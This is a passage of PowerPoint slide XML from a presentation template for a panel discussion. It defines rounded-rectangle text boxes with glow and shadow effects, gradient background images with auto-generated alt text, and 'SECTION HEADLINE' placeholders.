          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="2400" b="1" dirty="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B72F7432-C386-F0BE-A0AC-512D6600303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269799" y="6740498"/>
            <a:ext cx="3457603" cy="517582"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="2400" b="1" dirty="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B259DA9B-B36F-D2DB-C787-B87F954850A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588595" y="6740498"/>
            <a:ext cx="3457603" cy="517582"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="2400" b="1" dirty="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0824F2BD-1E4F-6C75-3E63-90C7736B040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3920750" y="6740498"/>
            <a:ext cx="3457603" cy="517582"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="2400" b="1" dirty="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9C7DE575-85FC-CB8A-AE21-C3A9BDE30B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4399" y="7346964"/>
            <a:ext cx="3474449" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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FBCB645D-FB14-40DA-FBA3-F5FF3CCDA23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269268" y="7353511"/>
            <a:ext cx="3457604" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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F5DAFD3E-0823-3FC4-3999-4265F002C52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588595" y="7360058"/>
            <a:ext cx="3457603" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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74BB461D-BC40-5468-360D-70D2B110F69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3920751" y="7366605"/>
            <a:ext cx="3452850" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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4665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pos="61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el discussion w/o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colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE6530D-5DD0-72C4-A106-33952B3839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270618" y="-23033027"/>
            <a:ext cx="46541235" cy="4654123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!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A74478E-260F-750C-8A34-C9A3FCB9DC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3132427" y="-12530930"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFA6BE4-4AAE-9B43-C605-9649C05B83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-20713754" y="-24632"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B3B2CF5-401B-0938-D0C3-4A10527891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462621" y="-15346108"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3ADCFD0-779F-E9FE-F595-F5794D66D69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-9661420" y="5036693"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DE5859-847A-43BA-54B5-347820F67D3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15711365" y="4180188"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19647EAE-DCAD-847E-1F8A-8E4C1706991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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818416" y="5036693"/>
            <a:ext cx="14486283" cy="10287000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8E89A3D0-5800-2FC0-96CF-ACE9C56680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91400" y="5142884"/>
            <a:ext cx="3457604" cy="957985"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="3200" b="1" dirty="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95788F94-6F34-9531-000F-25658FCDDF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91400" y="6191904"/>
            <a:ext cx="3457604" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4C4EA3-2DCC-C590-B013-385E4F2264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908085" y="-14476987"/>
            <a:ext cx="46541235" cy="4654123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7F52A056-FBFF-497A-27A2-B2B53C7A819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025019" y="9068017"/>
            <a:ext cx="2237962" cy="247216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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269D5BB8-887D-35F2-FC67-17E7F265869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71550" y="2354431"/>
            <a:ext cx="16395700" cy="146915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5400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="754164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1508328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2262492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3016656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for the panel discussion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9D5F24A1-5D57-7311-AC6D-5155C2D96D1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379282" y="6191904"/>
            <a:ext cx="3457604" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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EDCB4CD9-2BAA-30DF-73F6-4345FF75547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467164" y="6191904"/>
            <a:ext cx="3457604" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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EF5F6F8A-B9ED-E45E-34AA-B763E3A9297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3555046" y="6191904"/>
            <a:ext cx="3457604" cy="65645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>
              <a:defRPr lang="en-US" sz="2000" dirty="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31084C4A-D07F-2802-F152-1180A78F70D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379282" y="5137832"/>
            <a:ext cx="3457604" cy="957985"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="3200" b="1" dirty="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53BCBE1A-D1CB-5BD9-30B8-207B6F98B60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467164" y="5132780"/>
            <a:ext cx="3457604" cy="957985"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="3200" b="1" dirty="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E7EA3A90-2F2C-5907-3C1C-FF200DB9D52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3555046" y="5127728"/>
            <a:ext cx="3457604" cy="957985"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="342900">
              <a:srgbClr val="00BBC5">
                <a:alpha val="4000"/>
              </a:srgbClr>
            </a:glow>
            <a:outerShdw blurRad="406400" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="3200" b="1" dirty="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8798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pos="61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nel discussion w/o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colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE6530D-5DD0-72C4-A106-33952B3839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270618" y="-23033027"/>
            <a:ext cx="46541235" cy="4654123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!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A74478E-260F-750C-8A34-C9A3FCB9DC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3132427" y="-12530930"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFA6BE4-4AAE-9B43-C605-9649C05B83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-20713754" y="-24632"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B3B2CF5-401B-0938-D0C3-4A10527891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462621" y="-15346108"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3ADCFD0-779F-E9FE-F595-F5794D66D69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-9661420" y="5036693"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DE5859-847A-43BA-54B5-347820F67D3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15711365" y="4180188"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19647EAE-DCAD-847E-1F8A-8E4C1706991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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818416" y="5036693"/>
            <a:ext cx="14486283" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4C4EA3-2DCC-C590-B013-385E4F2264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908085" y="-14476987"/>
            <a:ext cx="46541235" cy="46541235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4107350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nel discussion w/o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!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A74478E-260F-750C-8A34-C9A3FCB9D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13132427" y="-12530930"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFA6BE4-4AAE-9B43-C605-9649C05B83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-20713754" y="-24632"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3ADCFD0-779F-E9FE-F595-F5794D66D6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-9661420" y="5036693"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DE5859-847A-43BA-54B5-347820F67D3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15711365" y="4180188"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19647EAE-DCAD-847E-1F8A-8E4C1706991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7818416" y="5036693"/>
            <a:ext cx="14486283" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="!!deckneon" descr="A colorful light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4C4EA3-2DCC-C590-B013-385E4F2264E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1908085" y="-14476987"/>
            <a:ext cx="46541235" cy="46541235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4264961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blue object&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07AE08AC-2B20-7D3B-F537-E351F63E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!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A74478E-260F-750C-8A34-C9A3FCB9DC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3723998" y="-7141249"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFA6BE4-4AAE-9B43-C605-9649C05B83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-12269311" y="3716593"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B3B2CF5-401B-0938-D0C3-4A10527891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9605333" y="391396"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3ADCFD0-779F-E9FE-F595-F5794D66D69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-9661420" y="5036693"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DE5859-847A-43BA-54B5-347820F67D3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6194567" y="5858129"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19647EAE-DCAD-847E-1F8A-8E4C1706991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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818416" y="5036693"/>
            <a:ext cx="14486283" cy="10287000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8E89A3D0-5800-2FC0-96CF-ACE9C56680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4233025"/>
            <a:ext cx="8229600" cy="182093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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="10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SECTION HEADLINE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11090946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pos="61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blue object&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C3C4AE-811F-8E34-B213-11E8398FFE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!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F57E24D-1E97-6F1B-B187-A78E837299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3723998" y="-7141249"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1718559-60A6-9096-A7C2-EB849E711AB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6947803" y="-2229959"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374DFE60-0C39-7828-89AA-1A6DE9CB8E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9339388" y="-11123265"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70508DAE-E02B-6543-371D-78217826AA6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9473179" y="657221"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA90A2FF-9832-88E9-CD9D-C9EAE7339DF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12738710" y="0"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B88EA2-FBBC-B710-F3D5-6284BE68401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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10569358" y="6640679"/>
            <a:ext cx="14486283" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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3A17383F-949F-D3A9-C6D3-CF20C72180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4233025"/>
            <a:ext cx="8229600" cy="182093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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="10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SECTION HEADLINE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18870326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pos="612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C79575-454B-0A1A-AB7A-518CE8E8D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875" b="21875"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8647416" y="-4879728"/>
            <a:ext cx="35638138" cy="20046455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
